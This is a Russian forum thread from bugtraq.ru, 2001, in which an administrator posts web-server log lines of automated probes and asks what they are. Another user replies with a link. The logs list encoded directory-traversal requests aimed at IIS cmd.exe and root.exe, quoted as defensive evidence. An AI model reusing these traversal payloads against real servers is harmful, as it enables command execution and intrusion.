информационная безопасность без паники и всерьез  подробно о проекте
			Анализ криптографических сетевых...   Модель надежности двухузлового...   Специальные марковские модели надежности...   Notepad++ полгода раздавал зараженные...   Китайский прорыв из ESXi   С наступающим
	главная обзор RSN блог библиотека закон бред форум dnet о проекте
	bugtraq.ru / форум / sysadmin		Имя Пароль

ФОРУМ если вы видите этот текст, отключите в настройках форума использование JavaScript регистрация Легенда:   новое сообщение   закрытая нитка   новое сообщение   в закрытой нитке   старое сообщение	Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания. Новичкам также крайне полезно ознакомиться с данным документом. Странные запросы к серверу 05.12.01 04:44   Автор: Spontanen Статус: Незарегистрированный пользователь <"чистая" ссылка> Анализируя лог файл web сервера, обнаружил следующие запросы pc227-9.yalla.com - - [04/Dec/2001:18:37:52 +1000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - pc227-9.yalla.com - - [04/Dec/2001:18:37:53 +1000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - pc227-9.yalla.com - - [04/Dec/2001:18:37:55 +1000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - pc227-9.yalla.com - - [04/Dec/2001:18:37:56 +1000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - pc227-9.yalla.com - - [04/Dec/2001:18:37:57 +1000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - pc227-9.yalla.com - - [04/Dec/2001:18:37:59 +1000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - pc227-9.yalla.com - - [04/Dec/2001:18:38:00 +1000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - pc227-9.yalla.com - - [04/Dec/2001:18:38:01 +1000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - pc227-9.yalla.com - - [04/Dec/2001:18:38:03 +1000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - pc227-9.yalla.com - - [04/Dec/2001:18:38:04 +1000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - pc227-9.yalla.com - - [04/Dec/2001:18:38:05 +1000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - pc227-9.yalla.com - - [04/Dec/2001:18:38:06 +1000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - pc227-9.yalla.com - - [04/Dec/2001:18:38:07 +1000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - pc227-9.yalla.com - - [04/Dec/2001:18:38:08 +1000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - pc227-9.yalla.com - - [04/Dec/2001:18:38:10 +1000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - pc227-9.yalla.com - - [04/Dec/2001:18:38:11 +1000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - Они повторяются в течении суток с регулярным постоянством. Меняется только адрес время от времени. Видать какая то дрянь регулярно запускается и пробует мой сервер. Что это может быть и как с ним бороться? Странные запросы к серверу 05.12.01 10:31   Автор: !mm <Ivan Ch.> Статус: Elderman <"чистая" ссылка> > Анализируя лог файл web сервера, обнаружил следующие > запросы <..поскипано..> > > Они повторяются в течении суток с регулярным постоянством. > Меняется только адрес время от времени. > Видать какая то дрянь регулярно запускается и пробует мой > сервер. > Что это может быть и как с ним бороться? > сходи почитай http://www.uinc.ru:8101/articles/zametki/007.shtml http://www.uinc.ru:8101/articles/zametki/007.shtml Странные запросы к серверу 06.12.01 03:12   Автор: Spontanen Статус: Незарегистрированный пользователь <"чистая" ссылка> Спасибо за информацию. Все стало предельно ясно. 1

Copyright © 2001-2026 Dmitry Leonov

Page build time: 0 s

Design: Vadim Derkach